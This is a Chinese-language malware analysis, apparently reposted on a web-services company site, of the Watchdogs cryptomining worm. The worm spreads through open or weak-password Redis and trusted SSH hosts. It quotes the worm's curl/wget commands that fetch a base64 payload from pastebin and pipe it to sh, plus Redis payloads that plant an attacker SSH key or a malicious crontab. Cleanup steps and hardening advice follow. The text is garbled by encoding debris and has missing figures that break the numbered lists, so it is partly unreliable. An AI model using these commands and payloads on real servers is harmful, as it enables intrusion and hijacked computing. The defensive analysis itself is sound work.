這篇文章給大家介紹Watchdogs怎樣利用實(shí)施大規(guī)模挖礦�����,內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒�,希望對(duì)大家能有所幫助。
成都創(chuàng)新互聯(lián)公司2013年成立,先為弋陽(yáng)等服務(wù)建站����,弋陽(yáng)等地企業(yè),進(jìn)行企業(yè)商務(wù)咨詢服務(wù)�。為弋陽(yáng)企業(yè)網(wǎng)站制作PC+手機(jī)+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問(wèn)題。
背景
2月20日17時(shí)許����,阿里云安全監(jiān)測(cè)到一起大規(guī)模挖礦事件,判斷為Watchdogs蠕蟲(chóng)導(dǎo)致�����,并在第一時(shí)間進(jìn)行了應(yīng)急處置��。
該蠕蟲(chóng)短時(shí)間內(nèi)即造成大量Linux主機(jī)淪陷��,一方面是利用redis未授權(quán)訪問(wèn)和弱密碼這兩種常見(jiàn)的配置問(wèn)題進(jìn)行傳播��,另一方面從known_hosts文件讀取ip列表���,用于登錄信任該主機(jī)的其他主機(jī)����。這兩種傳播手段都不是第一次用于蠕蟲(chóng),但結(jié)合在一起爆發(fā)出巨大的威力���。
然而Watchdogs并不是第一個(gè)造成這般影響的Redis蠕蟲(chóng)��。截至目前���,Redis配置問(wèn)題已慘遭40余種蠕蟲(chóng)攻擊和利用����;此外,其他種類(lèi)數(shù)據(jù)庫(kù)的配置問(wèn)題����,也難保不在將來(lái)成為黑客的目標(biāo)。
因此��,如何在分析此次Watchdogs挖礦蠕蟲(chóng)�����、提供清理建議的同時(shí)�,也分析了數(shù)據(jù)庫(kù)蠕蟲(chóng)的發(fā)展趨勢(shì),并針對(duì)類(lèi)似的大規(guī)模入侵事件的應(yīng)急和預(yù)防給出建議��。
Watchdogs 挖礦蠕蟲(chóng)簡(jiǎn)介
該蠕蟲(chóng)的感染路徑如下圖所示。
cdn.com/2263586317fbd3bd3031398a8e039908aaa6f9f9.png">
蠕蟲(chóng)傳播方式
攻擊者首先掃描存在未授權(quán)訪問(wèn)或弱密碼的Redis�����,并控制相應(yīng)主機(jī)去請(qǐng)求以下地址:
https://pastebin.com/raw/sByq0rym
該地址包含的命令是請(qǐng)求���、base64解碼并執(zhí)行另一個(gè)url地址的內(nèi)容:
(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d|sh
而https://pastebin.com/raw/D8E71JBJ 的內(nèi)容解碼后為一個(gè)bash腳本�����,腳本中又包含下載惡意程序Watchdogs的指令�。
(curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667479x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
如上圖所示�,本次蠕蟲(chóng)的橫向傳播分為兩塊。
一是Bash腳本包含的如下內(nèi)容�,會(huì)直接讀取主機(jī)上的/root/.ssh/known_hosts和/root/.ssh/id_rsa.pub文件,用于登錄信任當(dāng)前主機(jī)的機(jī)器�,并控制這些機(jī)器執(zhí)行惡意指令。
二是Bash腳本下載的Watchdogs程序���,通過(guò)對(duì)Redis的未授權(quán)訪問(wèn)和爆破��、以及對(duì)SSH的爆破�����,進(jìn)行橫向傳播�����。
具體為表現(xiàn)為�����,Watchdogs程序的Bbgo()函數(shù)中���,首先獲取要攻擊的ip列表
隨后嘗試登錄其他主機(jī)的ssh服務(wù),一旦登錄成功則執(zhí)行惡意腳本下載命令
惡意Bash腳本
除了下載Watchdogs程序和橫向傳播外���,Bash腳本還具有以下幾項(xiàng)功能
1.將下載自身的指令添加到crontab定時(shí)任務(wù)��,10分鐘執(zhí)行一次
殺死cpu占用大于80%的其他進(jìn)程
1.LibiosetWrite()
該函數(shù)主要執(zhí)行l(wèi)ibioset.so文件的寫(xiě)入
3.KsoftirqdsWriteRun()
解壓并寫(xiě)入挖礦程序及其配置文件
這里以執(zhí)行rm命令必須調(diào)用的unlink()函數(shù)為例���。
它只對(duì)不包含"ksoftirqds"、"ld.so.preload"���、"libioset.so"這幾個(gè)字符串的文件調(diào)用正常的unlink()�,導(dǎo)致幾個(gè)文件無(wú)法被正常刪除�。
其中forge_proc_cpu()函數(shù)�����,將返回硬編碼的字符串
而Redis本身遭受攻擊的主流方法也經(jīng)過(guò)了三個(gè)階段
1.攻擊者對(duì)存在未授權(quán)訪問(wèn)的Redis服務(wù)器寫(xiě)入ssh key���,從而可以暢通無(wú)阻登錄ssh服務(wù)
具體為執(zhí)行以下payload
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa 【sshkey】 root@kali\n\n\n"
save
其中【sshkey】表示攻擊者的密鑰
2.攻擊者對(duì)存在未授權(quán)訪問(wèn)的Redis服務(wù)器寫(xiě)入crontab文件,定時(shí)執(zhí)行惡意操作
具體為執(zhí)行以下payload
config set dir /var/spool/cron
config set dbfilename root
set x "【evil command】"
save
其中【evil command】表示定時(shí)執(zhí)行的惡意命令
3.以上兩個(gè)階段中僅對(duì)Redis完全沒(méi)有驗(yàn)證即可訪問(wèn)的情況����,第三個(gè)階段則開(kāi)始針對(duì)設(shè)置了密碼驗(yàn)證,但密碼較弱的Redis進(jìn)行攻擊�,受害范圍進(jìn)一步擴(kuò)大。
然而Redis并不是唯一一個(gè)受到黑客“青眼”的數(shù)據(jù)庫(kù)��。如下表所示�,SQL Server, MySQL, MongoDB這些常用數(shù)據(jù)庫(kù)的安全問(wèn)題,也被多個(gè)挖礦僵尸網(wǎng)絡(luò)所利用�����;利用方式集中在未授權(quán)訪問(wèn)��、密碼爆破和漏洞利用����。
Watchdogs入侵修復(fù)及清理方法
1.首先停止cron服務(wù)�����,避免因其不斷執(zhí)行而導(dǎo)致惡意文件反復(fù)下載執(zhí)行���。
如果操作系統(tǒng)可以使用service命令,則執(zhí)行
service crond stop
如果沒(méi)有service命令��,執(zhí)行
/etc/init.d/cron stop
2.隨后使用busybox刪除以下兩個(gè)so文件:
sudo busybox rm -f /etc/ld.so.preload
sudo busybox rm -f /usr/local/lib/libioset.so
sudo ldconfig
busybox是一個(gè)小巧的unix工具集�,許多Linux系統(tǒng)裝機(jī)時(shí)已集成。使用它進(jìn)行刪除是因?yàn)橄到y(tǒng)自帶的rm命令需要進(jìn)行動(dòng)態(tài)so庫(kù)調(diào)用����,而so庫(kù)被惡意hook了,無(wú)法進(jìn)行正常刪除���;而busybox的rm是靜態(tài)編譯的,無(wú)需調(diào)用so文件�����,所以不受影響�����。
3.清理惡意進(jìn)程
sudo kill -9 `ps -ef|grep Watchdogs|grep -v grep |awk '{print $2}'`
sudo kill -9 `ps -ef|grep ksoftirqds|grep -v grep |awk '{print $2}'`4.清理cron相關(guān)文件,重啟服務(wù)���,具體為檢查以下文件并清除其中的惡意指令:
/var/spool/cron/crontabs/root
/var/spool/cron/root
/etc/cron.d/root
之后執(zhí)行
service crond start
或
/etc/init.d/cron start
安全建議
數(shù)字加密貨幣的獲取依賴計(jì)算資源的特質(zhì)�,催生了黑客進(jìn)行大規(guī)模入侵的動(dòng)機(jī)和土壤����;類(lèi)似Watchdogs蠕蟲(chóng)這樣的數(shù)據(jù)庫(kù)入侵事件,不是第一起��,也不會(huì)是最后一起����。阿里云作為“編寫(xiě)時(shí)即考慮安全性”的平臺(tái),提供良好的安全基礎(chǔ)設(shè)施和豐富的安全產(chǎn)品����,幫助用戶抵御挖礦和入侵,同時(shí)提供以下安全建議:
1.在入侵發(fā)生之前����,加強(qiáng)數(shù)據(jù)庫(kù)服務(wù)的密碼,盡量不將數(shù)據(jù)庫(kù)服務(wù)開(kāi)放在互聯(lián)網(wǎng)上���,或根據(jù)實(shí)際情況進(jìn)行訪問(wèn)控制(ACL)�����。這些措施能夠幫助有效預(yù)防挖礦���、勒索等攻擊�����。平時(shí)還要注意備份資料���,重視安全產(chǎn)品告警。
2.如果懷疑主機(jī)已被入侵挖礦��,對(duì)于自身懂安全的用戶�����,在攻擊者手段較簡(jiǎn)單的情況下��,可以通過(guò)自查cpu使用情況��、運(yùn)行進(jìn)程����、定時(shí)任務(wù)等方式,鎖定入侵源頭�����。
3.對(duì)于攻擊者采用較多隱藏手段的攻擊(如本次的Watchdogs蠕蟲(chóng)����,使ps、top等系統(tǒng)命令失效)�,建議使用阿里云安全的下一代云防火墻產(chǎn)品,其阻斷惡意外聯(lián)��、能夠配置智能策略的功能���,能夠有效幫助防御入侵��。哪怕攻擊者在主機(jī)上的隱藏手段再高明����,下載��、挖礦�����、反彈shell這些操作,都需要進(jìn)行惡意外聯(lián)���;云防火墻的攔截將徹底阻斷攻擊鏈�����。此外�,用戶還可以通過(guò)自定義策略�,直接屏蔽pastebin.com、thrysi.com等廣泛被挖礦蠕蟲(chóng)利用的網(wǎng)站�����,達(dá)到阻斷入侵的目的����。
關(guān)于Watchdogs怎樣利用實(shí)施大規(guī)模挖礦就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助�����,可以學(xué)到更多知識(shí)�。如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到�����。
文章名稱:Watchdogs怎樣利用實(shí)施大規(guī)模挖礦
瀏覽路徑:http://weahome.cn/article/jegcss.html
重慶分公司
重慶分公司
